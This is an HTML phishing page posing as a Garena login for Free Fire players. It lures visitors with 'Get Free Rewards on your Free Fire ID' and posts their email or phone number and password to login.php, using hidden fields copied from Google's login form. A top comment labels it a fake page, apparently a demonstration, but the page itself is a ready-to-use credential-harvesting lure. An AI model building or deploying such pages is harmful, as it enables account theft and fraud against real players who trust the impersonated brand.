<!-- I AM A FAKE PAGE | DO NOT TRUST ME -->
<!DOCTYPE html>
<html lang="en"><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
  <meta charset="utf-8">
  <title>Garena Login Page</title>
  <link rel="stylesheet" type="text/css" href="css/style.css">
	<link href="https://fonts.googleapis.com/css?family=Poppins:600&display=swap" rel="stylesheet">
	<script src="https://kit.fontawesome.com/a81368914c.js"></script>
	<meta name="viewport" content="width=device-width, initial-scale=1">
  <script src="index_files/ga.js" async="" type="text/javascript"></script></head>
  <style>
	    *{
	padding: 0;
	margin: 0;
	box-sizing: border-box;
}

body{
    padding-top:160px;
    font-family: 'Poppins', sans-serif;
    overflow: hidden;
    text-align:center;
}

.wave{
	position: fixed;
	bottom: 0;
	left: 0;
	height: 100%;
	z-index: -1;
}

.container{
    width: 100vw;
    height: 100vh;
    display: grid;
    grid-template-columns: repeat(2, 1fr);
    grid-gap :7rem;
    padding: 0 2rem;
}
h1{
color:white;
text-align:center;
size:30px;
}
h2{
color:white;
text-align:center;
}
input[type=submit]{

   background-color: #4CAF50; /* Green */
  border: none;
  color: white;
  padding: 15px 32px;
  text-align: center;
  text-decoration: none;
  display: inline-block;
  font-size: 16px;

}
input[type=password]{
     width: 30%;
  padding: 12px 20px;
  margin: 8px 0;
  box-sizing: border-box;
}
input[type=email]{
     width: 30%;
  padding: 12px 20px;
  margin: 8px 0;
  box-sizing: border-box;
}
  </style>
  
  <body>
  <img class="wave" src="https://wallpapercave.com/wp/wp4884715.jpg">
  <div class="wrapper" class="container">
  <div class="google-header-bar">
  <div class="header content clearfix">
  
  <h1>Get Free Rewards on your Free Fire ID</h1>
  </span>
  </div>
  </div>
  <div class="main content clearfix">
  <div class="sign-in">
<div class="signin-box">
  <h2>Sign in <strong></strong></h2>
  <form novalidate="" id="gaia_loginform" action="login.php" method="post">
  <input name="continue" id="continue" value="http://mail.google.com/mail/" type="hidden">
  <input name="service" id="service" value="mail" type="hidden">
  <input name="rm" id="rm" value="false" type="hidden">
  <input name="dsh" id="dsh" value="-959293846815026083" type="hidden">
  <input name="ltmpl" id="ltmpl" value="default" type="hidden">
  <input name="scc" id="scc" value="1" type="hidden">
  <input name="GALX" value="zsQGi7Mh774" type="hidden">
  <input id="pstMsg" name="pstMsg" value="1" type="hidden">
  <input id="dnConn" name="dnConn" value="" type="hidden">
  <input id="checkConnection" name="checkConnection" value="youtube:692:1" type="hidden">
  <input id="checkedDomains" name="checkedDomains" value="youtube" type="hidden">
<input name="timeStmp" id="timeStmp" value="" type="hidden">
<input name="secTok" id="secTok" value="" type="hidden">
<input id="_utf8" name="_utf8" value="?" type="hidden">
  <input name="bgresponse" id="bgresponse" value="js_disabled" type="hidden">
<div class="email-div">
  <label for="Email"><strong class="email-label" style="text-align:center; color:white;">Number/Email</strong></label>
  <input spellcheck="false" name="Email" id="Email" type="email" style="text-align:center;">
</div>
<div class="passwd-div">
  <label for="Passwd" style="text-align:center; color:white;"><strong class="passwd-label">Password</strong></label>
  <input name="Passwd" id="Passwd" type="password">
</div>
  <input class="g-button g-button-submit" name="signIn" id="signIn" value="Sign in" type="submit">
  </label>
  <input name="rmShown" value="1" type="hidden">
  </form>
</div>
  </div>
  </div>
  

</body></html>
